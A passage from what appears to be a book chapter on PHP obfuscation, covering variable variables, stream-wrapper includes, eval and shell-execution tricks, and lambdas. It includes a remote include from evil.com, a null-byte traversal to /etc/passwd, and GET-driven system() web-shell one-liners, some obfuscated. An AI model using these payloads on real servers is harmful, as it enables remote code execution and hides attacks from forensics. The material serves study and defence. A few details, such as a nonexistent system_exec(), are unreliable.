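The round trip between array and object can be checked in isolation. The following is a minimal sketch, assuming a plain array as a stand-in for $_GET so that it runs outside a Web server; the helper name round_trip() is hypothetical.

```php
<?php
// Stand-in for $_GET so the sketch runs from the command line.
$params = ['a' => '1', 'b' => '2'];

// Hypothetical helper: array -> stdClass -> array.
function round_trip(array $data): array
{
    $object = (object) $data;   // keys become public properties
    return (array) $object;     // properties become keys again
}

$object = (object) $params;
echo $object->a, "\n";                        // property access instead of $params['a']
var_dump(round_trip($params) === $params);    // bool(true)
echo serialize($object), "\n";                // serialization has to be requested explicitly
```

For an analyst, the practical consequence is that a search for array-style access to a superglobal has to account for property-style access on a cast copy as well.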
One final note regarding the $_SERVER array. The technique of encrypting an attack payload in this way to hide information could be very valuable for an attacker. If an encrypted payload is being submitted via GET or POST and the key to decipher the text is being sent via an HTTP header or some other field the attacker can control, it will be extremely difficult (if not impossible) for the victim to put this information together after detecting the attack.
Mixing in other data types and comments
As with JavaScript and many other languages, PHP allows use of function calls and statements inside string concatenations. This, of course, makes a lot of sense for many real-world situations such as translation tools, templating engines, and other scenarios. But we can also use this feature for obfuscation and make it harder for an investigator to read the code. It is a very basic and simple obfuscation method, but it is nevertheless worth mentioning.
The initial vector we showed in the section “Obfuscation in PHP” used this technique, among others:
<?php
$${'_x'.array().'_'}=create_function(
'$a', 'retur'.@false.'n ev'.a.'l($a);');$$_x_('echo 1;'
);
Here, we used an empty array and the silenced false to add useless padding to the original payload to decrease its readability. It is also possible to work with functions that actually return data which cannot be used in the payload. A simple exclamation mark before the call renders the entire statement false, thus making it silent in the concatenation process:
<?php
$${'_x'.array()/**/.'_'}=#xyz
create_function(
'$a', 'retur'.@false.'n eva'//
.!htmlentities("hello!")./**/'l(/**\/*/$a);');$$_x_('echo 1;'
);
The example also contains the three comment styles PHP knows: one-line comments introduced by // or #, and multiline comments delimited by /* and */. They are often referred to as C-style (// and /* */) and Perl-style (#) comments.
Variable variables: The $$ notation
Another technique that is useful in an obfuscation context involves the variable variables PHP supports (see http://php.net/manual/en/language.variables.variable.php). This feature basically enables the developer to create variables with dynamic labels—for example, inside a loop. We used this feature in several of the example snippets, as it is rather well known and quite easy to understand. Here is a short example:
<?php
$a = 'a';
echo $a; // echoes the letter a
echo $$a; // also echoes the letter a: $$a == ${'a'} == $a
$a = 'b';
$b = 1;
echo $$a; // echoes 1: $$a == ${'b'} == $b
Since this feature does not stop with $$ but can be used with even more chained variable delimiters, it is easy to create code that looks quirky and is very hard to read. The following example illustrates this:
<?php
$$$$$$$$$$$$a = '_GET';
var_dump($a); // NULL
var_dump($$a); // '_GET'
var_dump($$$a); // the whole _GET array
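Chains like this become easier to follow when every link is a defined variable. The following is a minimal sketch, assuming three illustrative variables ($first, $second, $third) and a hypothetical helper resolve_chain() that walks the chain the way an analyst would do by hand.

```php
<?php
// Each variable holds the name of the next one in the chain.
$first  = 'second';
$second = 'third';
$third  = 'payload value';

echo $$first, "\n";    // value of $second: "third"
echo $$$first, "\n";   // value of $third: "payload value"

// Hypothetical helper: follow a chain of variable names step by step.
function resolve_chain(array $scope, string $name, int $depth): ?string
{
    $value = $name;
    for ($i = 0; $i < $depth; $i++) {
        if (!is_string($value) || !array_key_exists($value, $scope)) {
            return null; // chain breaks: undefined or non-string link
        }
        $value = $scope[$value];
    }
    return is_string($value) ? $value : null;
}

// A depth of 3 corresponds to $$$first.
echo resolve_chain(get_defined_vars(), 'first', 3), "\n"; // "payload value"
```

The depth argument equals the number of dollar signs, so counting them is enough to know how many lookups a chained expression performs.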
PHP also enables us to define the variable label in another way: using curly bracket notation.
Curly bracket notation
Curly bracket notation is comparable to the variable variables feature, since it allows us to execute code when forming the label for a variable. There are not many use cases in real-life applications where this feature makes sense, but some structural and design patterns are easier to implement with dynamic variable labels. The feature is easy to explain via the following example, in which we create several variables using curly bracket notation:
<?php
${'a'.'b'} = 1;
echo $ab; // echoes 1
${'a'.'b'.count(false)} = 2;
echo $ab1; // echoes 2
${str_repeat('ab',2)} = 3;
echo $abab; // echoes 3
As you can see, almost arbitrary code can be executed inside the curly brackets. And of course, it is also possible to work with comments, newlines, and all the other string-based obfuscation techniques we learned about earlier in this chapter. An interesting fact is that variables declared inside curly brackets will be available in the surrounding scope, not just inside the curly brackets themselves.
<?php
${1?''.include'evil.php':0} = 1;
${'abc'.@eval("\n\n\n\x65cho 1;")} = 2;
${1?''.include'data://text/html,<?php echo 1;?>':0} = 3;
The only actual limitation that plays a role for us in terms of code obfuscation is that only one statement can be used inside the brackets. It is not possible to terminate a statement with a semicolon and start over with another one. If an attacker does want to execute several statements, a small trick can help in this regard: using the include() or require() functionality and fetching the payload from another file (or from another domain, if the PHP configuration was sloppy), or a data URI. All the content of the file that is included will instantly be executed as expected.
<?php
${1?''.include'data://text/html,<?php echo 1;?>':0} = 2;
We will go into more detail regarding data URI inclusions and more ways to use include and require for code obfuscation in the next section, “Evaluating and executing code.” But before we do, here's another way to execute several statements: Just create a string of the payload to execute and feed it into an eval call, again enabling multiple statements between curly brackets:
<?php
${'abc'.eval('echo 1; echo 2;')} = 2;
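The curly bracket examples in this section can be condensed into one sketch that also runs on PHP 8, where count(false) throws a TypeError instead of returning 1. This is an illustration under that assumption: strlen('x') replaces count(false), and the wrapper function build_labels() is hypothetical.

```php
<?php
// Hypothetical wrapper so the dynamically named variables stay in one scope.
function build_labels(): array
{
    ${'a' . 'b'} = 1;                   // defines $ab
    ${'ab' . strlen('x')} = 2;          // strlen('x') is 1, so this defines $ab1
    ${str_repeat('ab', 2)} = 3;         // defines $abab
    ${'x' . eval('return "y";')} = 4;   // eval() supplies part of the label: $xy

    // The variables exist in the surrounding function scope.
    return compact('ab', 'ab1', 'abab', 'xy');
}

print_r(build_labels());
```

The eval() call returns a value that becomes part of the label, which is the same mechanism the listings above use to run code while a variable name is being formed.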
Evaluating and executing code
There are a lot of ways that strings can be evaluated and executed in PHP. One of the most basic ways is, of course, the classic include, meaning some file at some location that is reachable by the Web server or PHP runtime will be loaded, and all of its contents will be executed as though the file was opened directly by the PHP engine. The basic syntax is easy, and the family of include functions can be called either as a function or as a statement. Depending on the php.ini options, it might be possible to include resources via a URL, although this feature is switched off by default in modern PHP versions. The following snippet shows the php.ini settings responsible for this behavior:
;;;;;;;;;;;;;;;;;;
; Fopen wrappers;
;;;;;;;;;;;;;;;;;;
; Whether to allow the treatment of URLs (like http:// or ftp://) as files.
allow_url_fopen = On
; Whether to allow include/require to open URLs (like http:// or ftp://) as files.
allow_url_include = Off
Let us look at some examples for local file inclusion:
include('foo.txt');
include_once('../bar/foo.txt');
require 'foo.txt';
require_once '../bar/foo.txt';
require_once('http://evil.com/something/scary.php');
The last example snippet represents classic remote code execution. Whatever PHP code is stored on the evil.com domain will be executed on the box that executes the require_once statement. Another bad thing with inclusions is their vulnerability against null bytes in case the php.ini file or the application itself does not provide protection against it. It is easy to end a string used in an include with a null byte. A classic scenario looks like this:
<?php
include 'templates/'. $_GET['file']. '.tpl'; // file=../../../etc/passwd%00
If the magic_quotes_gpc setting is inactive, the injected null byte will simply do its job, truncating the string so that /etc/passwd is included rather than a file with the .tpl extension. If magic_quotes_gpc is switched on, which is the default for most older PHP 5 versions, it can usually be tricked by injecting a very long path and forcing a truncation. Quality resources on attack vectors such as this are available at the following URLs:
It is a good thing that at least allow_url_include is switched off by default, because it opens the door for a lot of interesting ways to include and execute data, as well as obfuscate and smuggle payloads past firewalls and other protective mechanisms. Not only can standard HTTP URLs be used but also file URIs, data URIs, and even the PHP stream handlers can be included in this way. Although file and data URIs are not really new to us, stream handlers are. Let us look at some examples to learn more about this:
<?php
include 'file:///etc/passwd';
include 'data://text/html,<h1>hello!</h1>';
include 'php://filter//////////resource=test2.php';
include 'php://filter/||/read=//|||//write=/resource=test2.php';
In the preceding code, we can see that PHP understands file URIs as well as data URIs. But what other protocol handlers are available? As mentioned, we are talking about streams here, which have been available since PHP 5. Streams are meant to provide a large array of possibilities to treat incoming and outgoing data before it's sent or internally processed. Instead of, for example, implementing his own complicated solutions for transferring binary files from application A to application B, a developer can make use of streams and encode the file in base64 to make sure no dangerous characters are put on the wire. Also, the data URI stream handler can be used for urlencoded data or any other format desired.
$h = fopen('php://filter/string.rot13|convert.base64-encode/resource=test.php','r');
print_r(stream_get_contents($h));
The methods for treating the string data can be stacked, as shown in the last example snippet where we first applied ROT13 encoding on the included file and then applied base64 encoding. Note that this would not make any sense in a real-life scenario, but it is possible to do. Also, we can use empty read= or write= directives as well as pipes and slashes for extra obfuscation.
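To see what such a stacked filter chain produces, and that an analyst can undo it, the chain can be applied to a throwaway file and reversed. This is a minimal sketch, assuming a temporary file in place of test.php; the helper names read_encoded() and decode_stack() are hypothetical.

```php
<?php
// Hypothetical helper: read a file through stacked read filters (ROT13, then base64).
function read_encoded(string $path): string
{
    return file_get_contents(
        'php://filter/read=string.rot13|convert.base64-encode/resource=' . $path
    );
}

// Hypothetical helper: undo the stack in reverse order (base64 first, then ROT13).
function decode_stack(string $encoded): string
{
    return str_rot13(base64_decode($encoded));
}

$path = tempnam(sys_get_temp_dir(), 'flt');   // throwaway file standing in for test.php
file_put_contents($path, '<?php echo 1;');

$encoded = read_encoded($path);
echo $encoded, "\n";                 // what travels over the wire or lands in a log
echo decode_stack($encoded), "\n";   // the original file content

unlink($path);
```

Filters are applied left to right, so decoding has to proceed right to left; knowing the order is what makes a captured string recoverable.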
Enabling allow_url_include via the php.ini or .htaccess file should at least be considered twice by developers and server admins, since it opens a whole new world of injection and obfuscation possibilities. Be sure you know whether your server allows URL inclusion if you host important projects. This is especially important where shared servers are concerned. The following link provides more in-depth information about allow_url_include:
You can find a thorough write-up on the php:// stream handler at http://illiweb.com/manuel/php/wrappers.php.html.
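Whether a given server allows URL inclusion can be checked from PHP itself. The following is a minimal sketch using ini_get(); the helper name url_wrapper_settings() is hypothetical, and the normalization to booleans is a convenience of this example rather than anything PHP prescribes.

```php
<?php
// Hypothetical helper: report whether URL wrappers are enabled for fopen() and include.
function url_wrapper_settings(): array
{
    $settings = [];
    foreach (['allow_url_fopen', 'allow_url_include'] as $name) {
        // ini_get() returns a string (or false for unknown directives); normalize to bool.
        $settings[$name] = filter_var(ini_get($name), FILTER_VALIDATE_BOOLEAN);
    }
    return $settings;
}

foreach (url_wrapper_settings() as $name => $enabled) {
    echo $name, ' = ', $enabled ? 'On' : 'Off', "\n";
}
```

Running this on a shared host shows the effective values for the current script, which may differ from the php.ini defaults if they were overridden elsewhere.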
As you can see, the inclusion of an existing file containing PHP code via a filter stream is equivalent to a regular include. But what should you do if there is no suitable file to include? Several papers have been published in the past few years explaining more or less reliable methods for getting a file uploaded on the targeted server, but streams provide a more elegant way to do this. It is possible to combine php://filter with data URI streams, as the next examples show, or just to use data URIs all alone:
<?php
include 'php://filter/////resource=data://,<?php echo "yay" ?>';
include 'data://,<?php echo "yay" ?>';
include 'data:///,<?phpinfo();';
The possibilities for encoding or character-based obfuscation are quite limited here, but at least we can use URL entities and mix upper- and lowercase characters. Only the protocol handler itself cannot be modified, so variations such as d%41ta: or even dAta: will not work at all.
<?php
IncluDe'data:%2f///,<?php+phPinFo%28);';
IncluDe"d\141ta:\x252f///,%\063c?php+phPinFo%28);";
Before we lose ourselves in code evaluation via inclusion and dissecting the stream handlers, let us look at the possibilities PHP provides for evaluating and executing code and how we can use those functions for obfuscation.
Standard methods and backtick notation
The most common function for evaluation (a.k.a. Direct Dynamic Code Evaluation) is, of course, eval(). In PHP, as well as in many other languages, it does nothing more than receive a string as an argument and execute the content of the string as PHP code. If the result of an eval statement needs to be returned to be used as a variable value or something similar, it is possible to use the return inside the string to be evaluated. Everything after the return will be ignored by the parser.
<?php
eval('echo 1;'); //1
echo eval('return 1;echo 2;'); //1
An injection point inside the string to evaluate can usually bypass the return barrier and make sure that code behind it can be executed as well. The kind of bypass logically depends on the injection point, but either comments, ternary operators, or constructs, as shown in the following code, can help:
<?php
echo eval('return 1 && eval("echo 2;");'); //2
echo eval('return 0 || eval("echo 2;");'); //2
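What eval() prints and what it returns are two separate things, and the nested examples are easier to follow when both are captured. The following is a minimal sketch using output buffering; the helper name run_snippet() is hypothetical.

```php
<?php
// Hypothetical helper: run a snippet, capture what it prints and what it returns.
function run_snippet(string $code): array
{
    ob_start();
    $returned = eval($code);
    $printed = ob_get_clean();
    return ['printed' => $printed, 'returned' => $returned];
}

var_dump(run_snippet('return 1; echo 2;'));             // prints nothing, returns int(1)
var_dump(run_snippet('echo 1;'));                       // prints "1", returns NULL
var_dump(run_snippet('return 1 && eval("echo 2;");'));  // prints "2", returns bool(false)
var_dump(run_snippet('return 0 || eval("echo 2;");'));  // prints "2", returns bool(false)
```

In the last two calls the inner eval() has no return statement and therefore yields NULL, so both expressions evaluate to false while the inner code has still been executed.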
Of course, it is possible to use entities in double-quoted strings, as shown in previous sections, but there is yet another way to generate strings for eval statements and other tricks. The technique is actually a kind of evaluation, but on the shell layer rather than in PHP itself. It is known as backtick notation, documented as the execution operator in the PHP docs, and is shorthand for the native function shell_exec().
PHP knows several functions capable of passing strings through to the command line. Besides shell_exec(), these functions include exec(), passthru(), and system(), among others. They are documented on the program execution function pages in the PHP docs (see www.php.net/manual/en/ref.exec.php). The main differences between them are their behaviors regarding return values and output display. Using the backtick operator, as mentioned, is equivalent to executing shell_exec(), which makes it particularly interesting for our goal of obfuscating code. Here is a very basic example showing how strings can be generated with this technique:
<?php
echo `echo 1`; //1
In the preceding code, PHP executed echo 1 on the shell and returned the received 1 to the echo statement, which results in nothing more than an echo 1. The interesting thing here is the possibility to use shell entities, and thus get a new layer of obfuscation via encoding. Not only can we use PHP entities but we can also use double-encoded representations of characters coming from the shell. Inside backtick operators, no quoting has to be used as long as the canonical form of characters or the octal entity representations are being used. Quotes are required only if hex entities need to be used.
<?php
echo `echo \101"\x41"'\x41'`; // AAAA
echo `echo A\101{$unused}"\x41"$unused'\x41'\n\x\y\z…`; //AAAA
The second snippet shows that undeclared variables are being ignored, and that arbitrary padding is placed at the end of the string. For a forensics researcher, it is now extremely difficult to determine where the actual payload ended and the padding began. Here is an example utilizing this technique, combined with double-quoted string obfuscation:
<?php
eval("echo `echo A\101{$unused}\"\x41\"$unused'\x41'\n\x\y\z…414141`;");
eval("\x65chO\140\x65cho\x20A\101".$_x."\"\x41\"$unused'\x41'\n\x\y\z!.414141`;");
eval("/\x2f\x0a\x65chO\140\x65cho\x20A\101".$_x."\"\x41\"$unused'\x41'\n\x\y\z!.414141`;");
The preceding example also adds the trick of using a one-line comment in combination with an entity for creating a new line, \x0A. We can, of course, use one-line comments as well as block comments.
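The relationship between the backtick operator, shell_exec(), and PHP's own escape handling can be verified with a harmless command. This is a minimal sketch, assuming a shell that provides echo and a PHP configuration in which shell_exec() is not disabled; the helper name run_shell() is hypothetical.

```php
<?php
// Hypothetical helper: run a command through the shell and trim the trailing newline.
function run_shell(string $command): string
{
    return trim((string) shell_exec($command));
}

// The backtick operator and shell_exec() hand the same command line to the shell.
$viaOperator = trim((string) `echo 1`);
var_dump($viaOperator === run_shell('echo 1'));   // bool(true)

// In a double-quoted string PHP resolves \101 and \x41 to "A" itself,
// so the shell only ever sees the decoded command.
$command = "echo \101\x41";
var_dump($command === 'echo AA');                 // bool(true)
echo run_shell($command), "\n";                   // AA
```

Dumping the command string before it reaches the shell, as the second var_dump() does, is usually the quickest way to strip this layer of encoding during analysis.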
More eval() alternatives
As mentioned, PHP knows a lot of ways to evaluate strings as actual executable code, and this book does not attempt to enumerate them all. Still, it is worth mentioning call_user_func(), call_user_func_array(), and register_shutdown_function(), which are discussed in detail at the following URLs:
The following example shows how we can use these functions to evaluate strings, with the first parameter controlling what function is to be called and the second parameter controlling the passed arguments:
<?php
register_shutdown_function('system','echo 1;');
call_user_func('system','echo 1;');
call_user_func_array('system',array('echo 1;')); // arguments must be passed as an array
This combination easily allows us to execute arbitrary code; eval() itself cannot be passed as an argument, but it is easy to get around this limitation via system and the PHP CLI or other tricks. Another commonly abused feature suitable for evaluating arbitrary code is the almost legendary e modifier for the regular expressions used by the PHP function preg_replace() (see www.php.net/manual/en/function.call-user-func-array.php):
<?php
preg_replace('//e', 'eval("echo 1;")', null);
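The calling convention of call_user_func() and call_user_func_array() shown earlier in this section can be tried with harmless string functions. The following is a minimal sketch in which strtoupper() and str_repeat() are stand-ins chosen for this illustration.

```php
<?php
// The callee is selected by a string; the arguments are supplied separately.
echo call_user_func('strtoupper', 'echo 1'), "\n";          // ECHO 1

// call_user_func_array() expects all arguments bundled in one array.
echo call_user_func_array('str_repeat', ['ab', 2]), "\n";   // abab

// The function name can itself be the result of an expression.
$name = 'str' . 'rev';
echo call_user_func($name, 'abc'), "\n";                    // cba
```

Because the function name is ordinary string data, it can come from any of the sources discussed earlier, including concatenation, encoding functions, and request data.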
Lambdas and create_function()
Anonymous functions in PHP are an interesting case to study, since this is one of the very few ways to actually assign functions to variables and work with lambda-like features. Many programming languages feature comparable functionality, among them JavaScript as well as many functional languages such as Lisp and Haskell. Here, we do not dive into the theoretical background of anonymous functions; instead, we discuss how they are used in PHP to evaluate and obfuscate code.
Anonymous functions in PHP are created with the function create_function(), which accepts two mandatory parameters. The first parameter is a string of one or more comma-separated arguments for the function to create. The second parameter is also a string and represents the actual function body to execute. An example of a very basic anonymous function performing string concatenation for two passed arguments looks like this:
<?php
$a = create_function('$a, $b', 'return $a.$b;');
echo $a('Hello ', 'Goodbye!'); // echoes "Hello Goodbye!"
The first parameter can, of course, also be an empty string, or even null, if no arguments are required. PHP is surprisingly strict regarding the type check in this situation, but as long as nulls or any form of string is being passed, this will work. As the following examples show, this is valid for binary strings, and even when another anonymous function returns a string. And if double quotes are used, all techniques for string obfuscation can be used as well.
<?php
$a = create_function(/**/null, b"\x65cho 1;");
$a();
$b = create_function(create_function('','return null;'),b'echo 1;');
$b();
The interesting thing about create_function() for obfuscation is that we can infinitely nest one anonymous function to be an argument for another anonymous function, which helps a lot in making code unreadable and hard to analyze. It is the same as endlessly nesting eval chains, enabling us to encode the actual executed string infinitely. The following snippet shows an eval chain used in combination with create_function():
<?php
$a=array();
$a[]=create_function(null,"\x65val(\"\x5cx65cho 1;\");");
$a[0]();
It is also easy to add function calls to base64_decode(), str_rot13(), or other encoding and decoding functions to the mix. The following example shows a very simple way to use more encoding techniques:
<?php
$a=array();
$a[]=create_function(
null,"eval(base64_decode('ZXZhbCgiXHg2NWNobyAxOyIpOw=='));"
);
$a[0]();
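Readers who want to reproduce these listings on a current installation should note that create_function() was deprecated in PHP 7.2 and removed in PHP 8.0. The following is a minimal sketch, assuming PHP 7 or later, that shows the closure equivalent of the concatenation example together with a hypothetical stand-in named make_function(), which mimics the string-based interface through eval() purely for experimentation.

```php
<?php
// Closure equivalent of create_function('$a, $b', 'return $a.$b;').
$concat = function ($a, $b) {
    return $a . $b;
};
echo $concat('Hello ', 'Goodbye!'), "\n";   // Hello Goodbye!

// Hypothetical stand-in for create_function(): builds the closure through eval().
function make_function(string $args, string $body): Closure
{
    return eval('return function (' . $args . ') {' . $body . '};');
}

// The body decodes "ZWNobyAxOw==" to "echo 1;" and evaluates it.
$nested = make_function('', 'return eval(base64_decode("ZWNobyAxOw=="));');
$nested();   // prints 1
```

The stand-in makes the underlying mechanism visible: a function assembled from strings is an eval() call in disguise, so the same detection logic applies to both.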
Anonymous and variable functions
In addition to working with lambda-like features, anonymous functions also enable us to work with variable functions. In PHP, callbacks and code structuring are based on the new predefined Closure class. This class unfortunately cannot be instantiated directly. Also, serializing anonymous functions either returns the serialized form of the return value or in more complex setups throws a fatal error. Consider the following code to learn how anonymous functions can be used:
<script language="javascript">
$a = function(){return 1;};
alert($a())
</script>
<?php
$a = function(){return 1;};
echo $a();
This feature is perfect for effective code obfuscation since it allows us to spread the business logic that is forming and executing the payload all over the vectors used for an attack. As in JavaScript, it is also possible to nest anonymous functions—mixing them up with the results of create_function() and eval() as well as using curly bracket notation for the label the function is being named with, including the dirty include tricks.
In PHP 5, anonymous functions cannot be invoked without an actual assignment (PHP 7 and later accept the immediately invoked form as well). JavaScript is far more flexible in this regard, and allows (function(a){})(1), but for better obfuscation, again the superglobals or other variables can be used.
<?php
(function($a){return $a;})(1); // won't work in PHP 5
$_[x]=function($a){return $a;};echo$_[x](1); // works
Still, this feature opens the gate for a whole new set of obfuscation techniques: nesting anonymous functions, combining them with create_function() and the mentioned eval, as well as the huge array of possible string obfuscation techniques enabling an attacker to create almost unreadable code. If the actual payload is again encrypted and can only be decrypted with knowledge of the key hidden in some variable of the $_SERVER array or any other data which is out of band and usually not being logged, it is possible to create vectors that are quite bulletproof against forensic measures, which makes extensive logging unavoidable and requires high levels of intrusion detection and intrusion prevention intelligence to be able to provide a decent protection level. The following example shows a mildly obfuscated but already hard to read representation of an echo 1; using create_function() and anonymous functions, while at the same time playing with the different scopes and the possibility of using same-named variables all over the code:
<?php
${$_=create_function(null,"\$_[x]=fun\x43tion(\$_){return\$_;};\x65cho\$_[x](1);")};$_();
This feature is somewhat similar to variable functions, which older PHP versions already support and which can be used to obfuscate code in cases where PHP 5.3 or later is not present on the targeted machine. Variable functions can be called quirky, if not something worse, and they are easiest to explain with an example:
<?php
function foo() {return 1;}
$foo = 'foo';
echo $foo(); // echoes 1
If a string is assigned to a variable and a function with the same name as the string exists in the scope, the variable can be used to reference the function: appending parentheses to the variable calls the function named by the string. This even works with superglobals, allowing code such as this:
<?php
// called with test.php?a=foo
echo $_GET['a']();
It is even possible to work with native functions and map them to variables via simple string assignment. At the time of this writing, PHP seems to block several functions for access via this technique; eval() fails, as does system_exec(). But system(), for example, works like a charm and allows code snippets such as this to work:
<?php
//called with test.php?a=system&b=echo 1;
$_GET['a']($_GET['b']);
<?php
/*called with test.php?a=sys&b=echo 1;&c=tem*/
$_[]=$_GET['a'].$_GET['c'];$_[0]($_GET['b']);
This can be considered obfuscation heaven and enables far more complex and quirky examples, especially when combined with the already mentioned obfuscation techniques.
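The fragment-based call and the limits of variable functions can be explored without touching the shell. This is a minimal sketch, assuming harmless functions as targets; the helper name call_by_fragments() is hypothetical.

```php
<?php
function foo() { return 1; }

// Hypothetical helper: assemble a function name from fragments and call it.
function call_by_fragments(array $fragments, ...$args)
{
    $name = implode('', $fragments);
    if (!is_callable($name)) {
        return null;   // covers language constructs such as eval
    }
    return $name(...$args);
}

var_dump(call_by_fragments(['f', 'oo']));               // int(1)
var_dump(call_by_fragments(['str', 'rev'], 'abc'));     // string(3) "cba"
var_dump(call_by_fragments(['ev', 'al'], 'echo 1;'));   // NULL
```

The last call returns NULL because eval is a language construct rather than a function, which matches the observation above that it cannot be reached through a variable.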
Summary
This chapter did not cover all possible obfuscation techniques available in PHP, because especially in terms of encoding and encryption, the possibilities are endless. However, we did cover basic and advanced string obfuscation patterns, learned how to access and cast superglobals, and saw several ways to execute code with eval() and beyond. In real-life situations, the possibility of using filters and streams for inclusions is particularly interesting, since many Web applications are vulnerable to local file inclusions, which can be easily turned into actual remote code executions with these techniques, while at the same time making detection and forensics extremely hard to accomplish. PHP is not very cooperative here, and it contains a lot of possibilities for creating code that is unreadable but still works.
PHP nevertheless contains far more quirks, bugs, and vulnerabilities which can be useful during an attack to unveil and manipulate data and execute code. PHP 6 might introduce a whole new array of issues and new obfuscation techniques, not only the Unicode support and the enhanced chr() function (see http://php.net/manual/en/function.chr.php). Unicode whitespace might play an important role as well as possibilities to generate ASCII payloads from a Unicode string by harvesting table index information from other characters.
With this discussion of PHP behind us, let us move on to Chapter 7 and see what techniques can be used to obfuscate queries and comparable data in SQL.